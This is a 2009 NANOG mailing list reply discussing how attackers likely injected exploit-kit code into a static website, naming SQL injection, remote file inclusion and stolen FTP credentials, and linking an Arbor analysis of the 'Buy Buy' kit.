Malicious code just found on web server
Nick Chapman
nicknetworks at gmail.com
Mon Apr 20 17:40:53 UTC 2009
On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngspook at gmail.com> wrote:
> I've run into this sort of attack before, where they change the page to load
> content from elsewhere; but I couldn't figure out how they managed to write
> to the sites' pages. They were hosted on a commercial webhost, and so if it
> was a compromised host (which seemed like the only possibility to me), that
> didn't speak well for the hosting company.
SQLi is prolly the most common way to inject code. Shared databases
can lead to shared security problems. It's also possible that the
hosting provider could be having other security issues that would
allow an attack to directly edit the website in question. Remote file
inclusions are also a popular way to modify web page. Include a web
shell, and then run a few commands to insert the malicious code into
the website.
> We were having issues with the company anyways, though; so I took down the
> site, sanitized the pages (and removed a bunch of junk), and put the site
> back up with another company.
>
> But if you figure out how they got write access to a static website, I'd
> love to hear it.
Compromised FTP credentials would be my guess. They can be obtained
by brute force attacks or credential stealing trojans.
The obfuscation used by this exploit kit looked kinda familiar, but I
wasn't able to match it to any exploit kits I know of. But it looks
like the guys at Arbor examined this at the beginning of the year:
http://asert.arbornetworks.com/2009/01/buy-buy-exploitation/
They're referring to it as Buy Buy due to the buybuy.html page. Also
looks like a commenter at the article mentions that he had a problem
with this that was caused by compromised ftp accounts.
Of course, given how often exploit kits are copied, modified, merged,
etc, etc. The buy buy kit could just be a relative of the this one.
Regards,
-Nick
More information about the NANOG
mailing list